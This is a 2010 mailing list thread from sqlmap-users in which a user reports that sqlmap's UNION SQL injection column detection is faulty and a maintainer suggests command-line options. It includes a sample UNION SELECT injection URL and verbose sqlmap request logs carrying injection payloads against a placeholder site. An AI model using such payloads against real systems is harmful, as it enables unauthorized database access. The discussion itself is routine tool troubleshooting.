Re: [sqlmap-users] Bug with union test?
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Bug with union test?
|
From: David G. <sk...@gm...> - 2010-05-10 16:56:13
|
Hmm.. seems to work through --string parameter... So I have to pass the --string parameter whenever I use the union technique to sqlmap identify it correctly!?! On Mon, May 10, 2010 at 11:09 AM, Bernardo Damele A. G. <ber...@gm...> wrote: > For me it works with no problems against SQL injection on SELECT with > more than a column. > Try to provide sqlmap with --string or --regex. Also, try with > --union-tech orderby. > > Bernardo > > > On Sun, May 9, 2010 at 21:33, David Guimaraes <sk...@gm...> wrote: >> I noticed that this is already happening for some time ago, sqlmap >> fails to properly detect UNION inband sql injection .. even in cases >> where the detection is quite simple as shown below: >> >> http://www.vulnsite.com/vulnscript.php?id=42 and 1 = 0 union all >> select 1,2,3,4,5,6 (mysql) >> >> I am currently editing the sessions file directly to use the UNION >> technique with sqlmap. >> >> By using the --union-test and verbose level 2, it was possible to >> identify that sqlmap not completely test the technique of NULL >> bruteforcing UNION. It tests only a single column, and reports that >> have found the flaw.. as show below: >> >> 16:58:09] [INFO] testing inband sql injection on parameter 'id' with >> NULL bruteforcing technique >> [16:58:09] [TRAFFIC OUT] HTTP request: >> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%203967=3967 >> HTTP/1.1 >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> Host: www.vulnsite.com >> Accept-language: en-us,en;q=0.5 >> Cookie: >> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >> Connection: close >> >> [16:58:10] [INFO] confirming full inband sql injection on parameter 'id' >> [16:58:10] [TRAFFIC OUT] HTTP request: >> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204073=4073 >> HTTP/1.1 >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> Host: www.vulnsite.com >> Accept-language: en-us,en;q=0.5 >> Cookie: >> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >> Connection: close >> >> [16:58:10] [WARNING] the target url is not affected by an exploitable >> full inband sql injection vulnerability >> [16:58:10] [INFO] confirming partial (single entry) inband sql >> injection on parameter 'id' by appending a false condition after the >> parameter value >> [16:58:11] [TRAFFIC OUT] HTTP request: >> GET /vulnscript.php?id=42%20AND%206261=6262%20UNION%20ALL%20SELECT%20NULL%23%20AND%206194=6194 >> HTTP/1.1 >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> Host: www.vulnsite.com >> Accept-language: en-us,en;q=0.5 >> Cookie: >> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >> Connection: close >> >> [16:58:11] [WARNING] the target url is not affected by an exploitable >> partial (single entry) inband sql injection vulnerability >> [16:58:11] [INFO] confirming partial (single entry) inband sql >> injection on parameter 'id' with negative parameter value >> [16:58:11] [TRAFFIC OUT] HTTP request: >> GET /vulnscript.php?id=-42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204970=4970 >> HTTP/1.1 >> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 >> Host: www.vulnsite.com >> Accept-language: en-us,en;q=0.5 >> Cookie: >> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 >> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net) >> Connection: close >> >> [16:58:12] [WARNING] the target url is not affected by an exploitable >> partial (single entry) inband sql injection vulnerability >> valid union: None >> >> Sqlmap documentation says: "By default sqlmap uses the NULL >> bruteforcing technique to detect the number of columns within the >> original SELECT statement." >> >> I think the correct use of brute force technique would be to test >> several columns until find the correct number. Right? >> >> -- >> David Gomes Guimarães >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > -- David Gomes Guimarães |
